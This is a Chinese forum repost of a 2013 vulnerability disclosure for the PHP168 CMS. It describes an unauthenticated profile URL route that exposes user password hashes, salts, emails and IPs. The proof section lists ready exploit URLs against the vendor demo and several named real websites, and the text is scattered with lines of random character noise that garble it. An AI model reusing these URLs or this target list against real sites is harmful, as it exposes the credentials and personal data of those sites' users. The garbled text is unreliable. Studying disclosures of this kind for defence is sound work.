|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
% g3 T+ X! C2 G l: \9 h+ r- v+ X% Z9 J9 N0 A
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
; Q2 {/ H/ D' o6 `
# Z1 d, q% k s+ b% ?, X! vhttp://php168.cn/com/homepage.php/admin/member-profile
, c1 u, }5 g! ?- ^2 H% _
) V0 _& o6 B- {由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
* p' a6 x9 j. @9 }http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg- ^5 X) t1 ~; e/ H+ l1 J
* C0 g# R# O6 P, f' b, y r6 s 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:8 F0 d$ w" K, G( Z( G7 S
! R+ G/ B* Y1 z2 c! q3 g; A6 Bhttp://www.zjfzol.com.cn/homepage.php/admin/member-profile3 t" c% u4 I8 n" F3 ^
, t/ X' U# L; ^7 S5 j9 r
http://www.scswl.cn/homepage.php/admin/member-profile+ V6 @2 }# S4 |! O
: f6 A5 Y0 f4 x- H' Bhttp://www.tunet.edu.cn/homepage.php/admin/member-profile
7 Q- M4 C! \: }6 ~
6 |9 f' F- k$ bhttp://www.itlead.com.cn/homepage.php/admin/member-profile0 ^7 m8 F8 [- C+ @) p( ^
' K5 H7 n1 B( S6 N2 f8 U" `http://www.aedp.cn/homepage.php/admin/member-profile: U: ]: r2 \: Q- E8 h
$ [0 I1 }$ `6 O& T# {/ M+ Lhttp://www.qianlongnews.com/homepage.php/test/member-profile( R9 M) O' Y$ P+ [4 E* U
9 |3 g! h+ F9 U% z+ whttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]% b3 c; m- b2 v2 i1 y
[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对